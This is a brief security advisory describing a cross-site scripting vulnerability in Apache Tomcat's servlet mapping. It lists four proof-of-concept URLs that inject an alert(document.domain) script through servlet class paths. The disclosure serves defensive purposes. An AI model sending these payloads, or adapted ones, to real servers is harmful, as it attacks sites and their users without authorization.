Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability

Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability

The following proof of concepts were provided by Matt Moore <matt@westpoint.ltd.uk>:

tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT>
tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT>